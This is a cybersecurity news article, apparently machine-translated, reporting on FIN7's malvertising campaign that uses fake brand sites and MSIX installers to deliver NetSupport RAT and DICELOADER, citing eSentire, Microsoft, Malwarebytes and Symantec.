A hacker group, responsible for cyber threats for financial purposes, known as FIN7 it was observed use malicious Google ads pretending to be legitimate brands as a means to distribute MSIX installers that culminate in the release of NetSupport RATa RAT that is however not new in the cyber threat environment.
What are the goals of the FIN7 hacker group
“Cybercriminals used malicious websites to impersonate well-known brandsincluding AnyDesk, WinSCP, BlackRock, Asana, Concur, The Wall Street Journal, Workable, and Google Meet” has declared cybersecurity firm eSentire in a report released earlier this week.
FIN7 (also known as Carbon Spider and Sangria Tempest) is a hacker group responsible of various cybercrimes, which has been active since at least 2013, initially engaged in targeted attacks on point-of-sale (PoS) devices to steal payment databefore moving on to breach large companies via ransomware campaigns.
Over the years, the hacker group has refined its tactics and arsenal of malware, adopting various custom malware families such as BIRDWATCH, Carbanak, DICELOADER (aka Lizar and Tirion), POWERPLANT, POWERTRASH, and TERMITE, among others.
Malware released by FIN7 is commonly distributed through spear-phishing campaigns as entry into the target network or host, although in recent months the group has used malvertising techniques to initiate attack chains.
Microsoft statements regarding FIN7
In December 2023, Microsoft said it observed attackers relying on Google ads to lure users into downloading malicious MSIX application bundles, which ultimately led to the execution of POWERTRASH, a PowerShell based in-memory dropper used to load NetSupport RAT and Gracewire.
“Sangria Tempest […] is a group of financial cybercriminals currently focused on performing intrusions that often lead to data theft, followed by targeted extortion or the release of ransomware such as Clop ransomware” has said the tech giant at the time.
The abuse of MSIX as a malware distribution vector by various attackers, likely due to its ability to bypass security mechanisms such as Microsoft Defender SmartScreen; this prompted Microsoft to disable the protocol handler by default.
In attacks observed by eSentire in April 2024, users who visit fake sites via Google ads are shown a pop-up message urging them to download a deceptive browser extension, which is an MSIX file containing a PowerShell script which, in turn, collects system information and contacts a remote server to retrieve another encoded PowerShell script.
The second PowerShell payload is used to download and run NetSupport RAT from a server controlled by attackers.
The Canadian cybersecurity firm also detected the remote access trojan used to distribute additional malware, including DICELOADER via a Python script.
“The incidents of FIN7 exploiting trusted brand names and using deceptive web ads to distribute NetSupport RAT followed by DICELOADER highlight the ongoing threat, particularly with the abuse of signed MSIX files by these cyber criminals, which has proven effective in their patterns,” eSentire said.
Over to Malwarebytes
Similar results have been reported regardless of Malwarebytes, which characterized the business as targeting enterprise users via malicious ads and modals mimicking high-profile brands such as Asana, BlackRock, CNN, Google Meet, SAP, and The Wall Street Journal. However, he did not attribute the campaign to FIN7.
News of FIN7’s malvertising plans coincides with a wave of infections SocGholish (also known as FakeUpdates) designed to target business partners.
“Attackers used ‘living-off-the-land’ techniques to collect sensitive credentials and, in particular, configured web beacons in both email signatures and network shares to map local and inter-company relationships,” eSentire said. “This behavior would suggest an interest in leveraging these relationships to target business peers of interest.”
It also follows the discovery of a malware campaign targeting Windows and Microsoft Office users to propagate RATs and cryptocurrency miners via cracks for popular software.
“Malware, once installed, often records commands in the task scheduler to maintain persistence, allowing continued installation of new malware even after removal“Symantec, owned by Broadcom, said.
#FIN7 #group #exploits #malicious #Google #ads #providing #RAT
